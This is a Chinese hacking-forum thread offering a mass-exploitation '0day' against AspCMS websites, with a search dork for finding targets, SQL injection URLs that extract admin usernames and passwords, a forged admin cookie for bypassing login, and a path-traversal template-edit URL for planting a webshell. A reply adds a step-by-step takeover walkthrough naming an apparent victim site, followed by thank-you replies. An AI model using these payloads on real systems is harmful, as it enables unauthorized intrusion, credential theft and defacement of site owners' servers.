查看: 81296|回复: 171

aspcms批量拿站Oday

[复制链接]
发表于 2015-6-13 22:13:27 | 显示全部楼层 |阅读模式
本帖最后由 90_ 于 2015-6-14 10:41 编辑

aspcms批量拿站Oday
google:有限公司--Powered by ASPCMS V2.0
后台默认地址:/admin_aspcms/login.asp /admin/login.asp : admin_aspcms/index.asp


Exp:/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

aspcms各版本漏洞0day集合

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

————————————————————————
Powered by AspCms2.0
未验证权限,且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名:aspcms_user
列名:loginname、password

利用EXP:
admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

2.0漏洞测试人:逍遥复仇(请注明)

——————Cookies欺骗——————
cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
逍遥复仇碰到一个站后台被管理员改了,NND。后台主页半天没有找到,最后去官方down源码查看是home.asp(版本不同如不对请试main.asp),工具为:Cookie & Inject Browser
——————webshell获取——————
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了
admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.aspaspcms批量拿站Oday


分享


回复

使用道具 举报

发表于 2015-6-14 09:49:23 | 显示全部楼层
你这个 还没有我 的全面。。
---------------------------------------------------------------
后台如下
/admin/
/admin_aspcms/
/admin_login/

工具 中国菜刀

第一步 找到后台

后台可以用御剑 扫
基本都是/admin/
密码自己先猜一下
不知道 再继续下一步

右键查看源码 查看cms

Powered by AspCms2.0

AspCms2.0这个是cms版本 我们百度一下这个漏洞就行了


第二步 想办法写入shell

先看一下 能不能知道密码

md5:9c76f6cd4844fadc

我是cookie 欺骗
下面就是根据漏洞欺骗

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

好了 越过去了 下面是我用过的密码 2013

那我们怎么知道地址呢?

http://szhaierzn.com/index.asp
就是
admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp
admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../inc/AspCms_SettingClass.asp
admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../config/AspCms_Config.asp
也就是 web根目录
我们就直接这样填

直接有管理员权限
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了<<==这个是写入shell

第三步 拿下网站
好了 还是很简单的 谢谢大家

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1
----------------------------------------------------------------------------------------------------------------------------------
下载链接:http://pan.baidu.com/s/1jGy5vPs

点评

66666  详情 回复 发表于 2015-6-20 18:11
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-6-20 18:11:59 | 显示全部楼层
中国之利刃 发表于 2015-6-14 09:49
你这个 还没有我 的全面。。
---------------------------------------------------------------
后台如下

66666
                             
回复 支持 反对

使用道具 举报

发表于 2015-6-21 10:25:52 | 显示全部楼层
这个必须顶   。
回复 支持 反对

使用道具 举报

发表于 2015-6-26 21:02:43 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-6-27 09:07:32 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-6-27 09:16:45 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-6-28 14:42:41 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-6-28 15:49:29 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-6-28 15:50:30 | 显示全部楼层
学习学习技术,加油!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 10:07 , Processed in 0.032337 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部